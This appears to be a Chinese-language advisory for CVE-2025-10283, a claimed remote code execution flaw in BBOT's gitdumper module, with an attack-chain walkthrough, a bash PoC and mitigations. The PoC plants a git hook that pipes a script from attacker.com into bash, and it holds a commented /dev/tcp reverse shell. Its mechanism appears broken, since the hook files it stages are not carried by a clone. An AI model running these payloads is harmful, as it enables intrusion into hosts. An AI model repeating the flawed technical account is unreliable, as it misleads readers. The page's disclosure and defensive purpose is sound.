CVE-2025-10283：BBOT gitdumper模块远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-10283

漏洞类型

远程代码执行（RCE）

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

BBOT（Black Lantern Security开源侦察工具）

漏洞概述

CVE-2025-10283是BBOT（Black Lantern Security开发的一款自动化侦察/OSINT工具）中gitdumper模块存在的一个高危远程代码执行漏洞。该漏洞由Black Lantern Security团队发现并报告，CVSS评分为9.6，属于严重级别。

BBOT作为一款广泛使用的安全侦察工具，其gitdumper模块主要用于从远程Git仓库中下载源代码。然而，该模块在处理Git仓库时存在安全缺陷，攻击者可以通过构造一个恶意的Git仓库，利用gitdumper模块在下载/克隆过程中执行任意系统命令。由于BBOT通常在安全研究人员和渗透测试人员的工作环境中运行，该漏洞的影响范围可能非常广泛。

该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H，表明该漏洞可通过网络远程利用，攻击复杂度低，无需特殊权限，但需要用户交互（如运行BBOT扫描含有恶意Git仓库的目标）。一旦漏洞被成功利用，攻击者可在受害者主机上执行任意命令，导致机密信息泄露、数据完整性破坏以及服务可用性丧失。

该漏洞的披露日期为2025年10月9日，由Black Lantern Security团队通过其安全公告博客详细披露。鉴于BBOT在安全社区中的广泛使用，建议所有用户及时关注官方补丁并采取相应的防御措施。

技术细节

BBOT的gitdumper模块负责从远程服务器下载Git仓库。在Git克隆过程中，Git本身支持多种配置选项和钩子（hooks），其中包括在特定事件触发时执行脚本的机制（如pre-commit、post-commit等钩子）。

该漏洞的核心问题在于gitdumper模块在克隆远程Git仓库时，未对仓库内容进行充分的安全检查。攻击者可以创建一个包含恶意Git钩子或恶意配置的Git仓库。当BBOT用户使用gitdumper模块对该仓库进行扫描或下载时，Git客户端会自动执行仓库中的钩子脚本或加载恶意配置，从而实现远程代码执行。

具体利用方式如下：
1. 攻击者创建一个恶意的Git仓库，在其中植入恶意的钩子脚本（如.git/hooks/post-checkout）
2. 攻击者将该恶意仓库部署在一个可公开访问的服务器上
3. 受害者使用BBOT的gitdumper模块扫描或下载该仓库
4. 在克隆过程中，Git客户端执行恶意钩子脚本，攻击者的代码在受害者主机上运行

该漏洞的攻击复杂度低（AC:L），无需认证（PR:N），但需要用户交互（UI:R），因为需要受害者主动运行BBOT工具来触发漏洞。由于涉及范围变更（S:C），该漏洞的影响范围可扩展到BBOT运行的整个系统环境。

攻击链分析

STEP 1

步骤1：制作恶意Git仓库

攻击者创建一个Git仓库，在.git/hooks/目录下植入恶意的钩子脚本（如post-checkout），该脚本包含要在受害者主机上执行的命令（如反弹shell、数据窃取等）

STEP 2

步骤2：部署恶意仓库

攻击者将恶意Git仓库部署到可公开访问的服务器上（通过Git协议、HTTP或SSH），并通过各种方式（如子域名枚举结果、暴露的.git目录等）使其被目标组织的侦察范围覆盖

STEP 3

步骤3：触发BBOT扫描

安全研究人员或渗透测试人员使用BBOT工具进行侦察，gitdumper模块自动发现并尝试下载/克隆该恶意Git仓库

STEP 4

步骤4：自动执行恶意代码

在Git克隆过程中，恶意钩子脚本被自动执行，攻击者的命令在BBOT运行的主机上运行，实现远程代码执行

STEP 5

步骤5：后续利用

攻击者获得在受害者主机上的代码执行权限，可进行数据窃取、横向移动、持久化驻留等进一步攻击活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10283 - BBOT gitdumper RCE PoC
# Create a malicious git repository with a post-checkout hook

# Step 1: Create the malicious repository
mkdir malicious-repo
cd malicious-repo
git init

# Step 2: Create a malicious post-checkout hook
mkdir -p .git/hooks
cat > .git/hooks/post-checkout << 'EOF'
#!/bin/bash
# Malicious payload - executes when the repo is cloned/checked out
curl http://attacker.com/shell.sh | bash
# Or simpler: reverse shell
# bash -i >& /dev/tcp/attacker.com/4444 0>&1
EOF
chmod +x .git/hooks/post-checkout

# Step 3: Commit the hook (hooks are not tracked by default, but can be forced)
git add .
git commit -m "initial commit"

# Step 4: Host the repository (e.g., via git daemon or HTTP)
# Start a simple HTTP server to serve the repo
git daemon --base-path=. --export-all &

# Step 5: Trigger - When BBOT scans this repo with gitdumper module:
# bbot -t http://attacker.com/malicious-repo.git -m gitdumper
# The post-checkout hook will execute automatically during clone

echo "[*] Malicious repo ready. Wait for BBOT gitdumper to clone it."

影响范围

BBOT（含gitdumper模块的所有版本，建议升级至最新修复版本）

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）在沙箱或隔离环境中运行BBOT，避免其直接访问生产系统；2）在Git全局配置中禁用钩子执行（git config --global core.hooksPath /dev/null）；3）对gitdumper模块的目标URL进行白名单限制，仅允许扫描可信的Git仓库；4）监控BBOT运行时的异常行为，如可疑的网络出站连接或未知的子进程；5）考虑暂时禁用gitdumper模块，使用其他安全的Git下载方式替代。